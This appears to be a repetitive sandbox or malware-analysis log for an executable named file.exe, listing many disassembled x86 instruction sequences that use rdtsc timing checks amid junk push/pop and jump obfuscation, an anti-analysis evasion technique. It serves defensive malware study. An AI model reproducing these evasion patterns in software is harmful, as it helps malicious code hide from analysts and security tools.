                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96B70E second address: 96B736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF17CC823B6h 0x00000009 jg 00007FF17CC823A6h 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96B736 second address: 96B764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FF17CBED4FFh 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FF17CBED4F7h 0x00000012 popad 0x00000013 jg 00007FF17CBED504h 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96B764 second address: 96B772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF17CC823A6h 0x0000000a pop edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8806A3 second address: 8806AC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0379 second address: 4FD03E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF17CC823B0h 0x00000009 sub esi, 16B1DC68h 0x0000000f jmp 00007FF17CC823ABh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FF17CC823B8h 0x0000001b add ch, FFFFFFC8h 0x0000001e jmp 00007FF17CC823ABh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FF17CC823B4h 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD03E1 second address: 4FD042F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CBED4EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov dh, ch 0x0000000d pushfd 0x0000000e jmp 00007FF17CBED4F1h 0x00000013 sub al, 00000046h 0x00000016 jmp 00007FF17CBED4F1h 0x0000001b popfd 0x0000001c popad 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 jmp 00007FF17CBED4ECh 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD042F second address: 4FD0433 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0433 second address: 4FD045A instructions: 0x00000000 rdtsc 0x00000002 call 00007FF17CBED4EEh 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov edx, dword ptr [ebp+0Ch] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF17CBED4EDh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD045A second address: 4FD04C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushfd 0x00000006 jmp 00007FF17CC823AAh 0x0000000b adc ecx, 709FE378h 0x00000011 jmp 00007FF17CC823ABh 0x00000016 popfd 0x00000017 pushfd 0x00000018 jmp 00007FF17CC823B8h 0x0000001d add ax, 7DD8h 0x00000022 jmp 00007FF17CC823ABh 0x00000027 popfd 0x00000028 popad 0x00000029 popad 0x0000002a mov ecx, dword ptr [ebp+08h] 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FF17CC823B5h 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD04C2 second address: 4FD04FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF17CBED4F7h 0x00000009 sbb cx, 85FEh 0x0000000e jmp 00007FF17CBED4F9h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF075A second address: 4FF07A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CC823ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FF17CC823B4h 0x00000011 or eax, 7FF8C2C8h 0x00000017 jmp 00007FF17CC823ABh 0x0000001c popfd 0x0000001d mov bx, ax 0x00000020 popad 0x00000021 xchg eax, esi 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushad 0x00000026 popad 0x00000027 mov di, 0410h 0x0000002b popad 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF07A1 second address: 4FF07A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF07A6 second address: 4FF0825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FF17CC823B2h 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FF17CC823AEh 0x00000015 adc ecx, 51127788h 0x0000001b jmp 00007FF17CC823ABh 0x00000020 popfd 0x00000021 mov ah, D3h 0x00000023 popad 0x00000024 xchg eax, esi 0x00000025 pushad 0x00000026 mov esi, edi 0x00000028 pushad 0x00000029 mov eax, edx 0x0000002b movsx edx, si 0x0000002e popad 0x0000002f popad 0x00000030 lea eax, dword ptr [ebp-04h] 0x00000033 jmp 00007FF17CC823AEh 0x00000038 nop 0x00000039 jmp 00007FF17CC823B0h 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007FF17CC823AEh 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0825 second address: 4FF083E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CBED4EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov si, dx 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF08C7 second address: 4FF08CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF08CB second address: 4FF08CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF08CF second address: 4FF08D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF08D5 second address: 4FF08F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CBED4F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF08F3 second address: 4FF08F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF08F7 second address: 4FF08FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF09AE second address: 4FF0018 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CC823B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a pushad 0x0000000b mov cx, ADBDh 0x0000000f pushfd 0x00000010 jmp 00007FF17CC823AAh 0x00000015 sbb cx, 6998h 0x0000001a jmp 00007FF17CC823ABh 0x0000001f popfd 0x00000020 popad 0x00000021 retn 0004h 0x00000024 nop 0x00000025 sub esp, 04h 0x00000028 cmp eax, 00000000h 0x0000002b setne al 0x0000002e jmp 00007FF17CC823A2h 0x00000030 xor ebx, ebx 0x00000032 test al, 01h 0x00000034 jne 00007FF17CC823A7h 0x00000036 xor eax, eax 0x00000038 mov dword ptr [esp], 00000000h 0x0000003f mov dword ptr [esp+04h], 00000000h 0x00000047 call 00007FF1815C3BD3h 0x0000004c mov edi, edi 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007FF17CC823B2h 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0018 second address: 4FF0027 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CBED4EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0027 second address: 4FF003F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF17CC823B4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF003F second address: 4FF0107 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CBED4EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov eax, 3E48B75Bh 0x00000012 jmp 00007FF17CBED4F0h 0x00000017 popad 0x00000018 push eax 0x00000019 jmp 00007FF17CBED4EBh 0x0000001e xchg eax, ebp 0x0000001f jmp 00007FF17CBED4F6h 0x00000024 mov ebp, esp 0x00000026 pushad 0x00000027 pushad 0x00000028 pushad 0x00000029 popad 0x0000002a mov edi, ecx 0x0000002c popad 0x0000002d pushfd 0x0000002e jmp 00007FF17CBED4F6h 0x00000033 and ax, 67E8h 0x00000038 jmp 00007FF17CBED4EBh 0x0000003d popfd 0x0000003e popad 0x0000003f push FFFFFFFEh 0x00000041 pushad 0x00000042 mov dx, si 0x00000045 pushad 0x00000046 movzx ecx, bx 0x00000049 mov cl, bl 0x0000004b popad 0x0000004c popad 0x0000004d push 2E7FDD2Dh 0x00000052 jmp 00007FF17CBED4EBh 0x00000057 xor dword ptr [esp], 58B84365h 0x0000005e jmp 00007FF17CBED4F6h 0x00000063 call 00007FF17CBED4E9h 0x00000068 push eax 0x00000069 push edx 0x0000006a push eax 0x0000006b push edx 0x0000006c pushad 0x0000006d popad 0x0000006e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0107 second address: 4FF0124 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CC823B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0124 second address: 4FF0140 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CBED4F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0140 second address: 4FF0144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0144 second address: 4FF015E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CBED4F6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF015E second address: 4FF01B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 3244h 0x00000007 call 00007FF17CC823ADh 0x0000000c pop esi 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FF17CC823B3h 0x0000001b xor cx, 8A0Eh 0x00000020 jmp 00007FF17CC823B9h 0x00000025 popfd 0x00000026 popad 0x00000027 mov eax, dword ptr [eax] 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF01B7 second address: 4FF01BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF01BB second address: 4FF01BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF01BF second address: 4FF01C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF01C5 second address: 4FF01F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CC823B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jmp 00007FF17CC823B1h 0x00000012 pop eax 0x00000013 pushad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF01F8 second address: 4FF0299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FF17CBED4EFh 0x0000000a and ax, F22Eh 0x0000000f jmp 00007FF17CBED4F9h 0x00000014 popfd 0x00000015 popad 0x00000016 popad 0x00000017 mov eax, dword ptr fs:[00000000h] 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FF17CBED4ECh 0x00000024 adc ch, FFFFFFA8h 0x00000027 jmp 00007FF17CBED4EBh 0x0000002c popfd 0x0000002d push eax 0x0000002e pushad 0x0000002f popad 0x00000030 pop edx 0x00000031 popad 0x00000032 nop 0x00000033 pushad 0x00000034 push ecx 0x00000035 call 00007FF17CBED4EDh 0x0000003a pop ecx 0x0000003b pop ebx 0x0000003c mov esi, 588BD2DDh 0x00000041 popad 0x00000042 push eax 0x00000043 jmp 00007FF17CBED4F3h 0x00000048 nop 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007FF17CBED4F5h 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0299 second address: 4FF02C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CC823B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 18h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF17CC823ADh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF02C0 second address: 4FF02C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF02C6 second address: 4FF02CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF02CA second address: 4FF02CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF02CE second address: 4FF02E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF17CC823ABh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF02E4 second address: 4FF02EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF02EA second address: 4FF02EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF02EE second address: 4FF0348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b jmp 00007FF17CBED4F7h 0x00000010 xchg eax, esi 0x00000011 pushad 0x00000012 mov edi, esi 0x00000014 mov ax, 87F7h 0x00000018 popad 0x00000019 push eax 0x0000001a jmp 00007FF17CBED4EDh 0x0000001f xchg eax, esi 0x00000020 pushad 0x00000021 mov edi, ecx 0x00000023 popad 0x00000024 push ecx 0x00000025 jmp 00007FF17CBED4F2h 0x0000002a mov dword ptr [esp], edi 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0348 second address: 4FF034C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF034C second address: 4FF0369 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CBED4F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0369 second address: 4FF0395 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, dl 0x00000005 call 00007FF17CC823B8h 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [76C84538h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0395 second address: 4FF0399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0399 second address: 4FF039D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF039D second address: 4FF03A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF03A3 second address: 4FF03A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF03A9 second address: 4FF03CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [ebp-08h], eax 0x0000000b jmp 00007FF17CBED4F3h 0x00000010 xor eax, ebp 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 mov si, di 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF03CF second address: 4FF041A instructions: 0x00000000 rdtsc 0x00000002 mov esi, edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FF17CC823B3h 0x0000000c or eax, 6767E35Eh 0x00000012 jmp 00007FF17CC823B9h 0x00000017 popfd 0x00000018 popad 0x00000019 nop 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF17CC823ADh 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF041A second address: 4FF0420 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0420 second address: 4FF0448 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CC823B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov eax, 3002B391h 0x00000014 mov eax, 610DF7CDh 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0448 second address: 4FF044E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF044E second address: 4FF050B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CC823B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d push ecx 0x0000000e push edi 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pushfd 0x00000012 jmp 00007FF17CC823B4h 0x00000017 sbb ah, 00000078h 0x0000001a jmp 00007FF17CC823ABh 0x0000001f popfd 0x00000020 popad 0x00000021 lea eax, dword ptr [ebp-10h] 0x00000024 pushad 0x00000025 mov cx, 89CBh 0x00000029 pushfd 0x0000002a jmp 00007FF17CC823B0h 0x0000002f and cl, FFFFFFD8h 0x00000032 jmp 00007FF17CC823ABh 0x00000037 popfd 0x00000038 popad 0x00000039 mov dword ptr fs:[00000000h], eax 0x0000003f jmp 00007FF17CC823B6h 0x00000044 mov dword ptr [ebp-18h], esp 0x00000047 jmp 00007FF17CC823B0h 0x0000004c mov eax, dword ptr fs:[00000018h] 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007FF17CC823B7h 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF050B second address: 4FF0511 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0511 second address: 4FF0515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0515 second address: 4FF05C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CBED4EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, dword ptr [eax+00000FDCh] 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FF17CBED4F4h 0x00000018 jmp 00007FF17CBED4F5h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FF17CBED4F0h 0x00000024 jmp 00007FF17CBED4F5h 0x00000029 popfd 0x0000002a popad 0x0000002b test ecx, ecx 0x0000002d pushad 0x0000002e mov cl, 6Ah 0x00000030 mov ebx, 317853FCh 0x00000035 popad 0x00000036 jns 00007FF17CBED585h 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f movzx eax, dx 0x00000042 pushfd 0x00000043 jmp 00007FF17CBED4F9h 0x00000048 and cx, 3A06h 0x0000004d jmp 00007FF17CBED4F1h 0x00000052 popfd 0x00000053 popad 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF05C9 second address: 4FF05CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF05CF second address: 4FF05D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF05D3 second address: 4FF0618 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF17CC823B7h 0x00000013 add cx, 7DEEh 0x00000018 jmp 00007FF17CC823B9h 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0618 second address: 4FF0628 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF17CBED4ECh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE01CF second address: 4FE01F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CC823B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov dh, ah 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE01F2 second address: 4FE024C instructions: 0x00000000 rdtsc 0x00000002 mov dx, 6AEAh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushfd 0x00000009 jmp 00007FF17CBED4EBh 0x0000000e adc cl, FFFFFF8Eh 0x00000011 jmp 00007FF17CBED4F9h 0x00000016 popfd 0x00000017 popad 0x00000018 push eax 0x00000019 pushad 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FF17CBED4EDh 0x00000021 sub ch, FFFFFFC6h 0x00000024 jmp 00007FF17CBED4F1h 0x00000029 popfd 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE024C second address: 4FE0265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 mov si, bx 0x00000009 pop ebx 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF17CC823ABh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE0265 second address: 4FE02C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CBED4F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FF17CBED4EEh 0x00000010 sub esp, 2Ch 0x00000013 pushad 0x00000014 mov di, si 0x00000017 push eax 0x00000018 push edx 0x00000019 pushfd 0x0000001a jmp 00007FF17CBED4F8h 0x0000001f sub ecx, 67371858h 0x00000025 jmp 00007FF17CBED4EBh 0x0000002a popfd 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE02C6 second address: 4FE0320 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF17CC823B8h 0x00000008 sub cx, A2B8h 0x0000000d jmp 00007FF17CC823ABh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ebx 0x00000017 pushad 0x00000018 mov ecx, 2177270Bh 0x0000001d jmp 00007FF17CC823B0h 0x00000022 popad 0x00000023 push eax 0x00000024 jmp 00007FF17CC823ABh 0x00000029 xchg eax, ebx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE0320 second address: 4FE0324 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE0324 second address: 4FE032A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
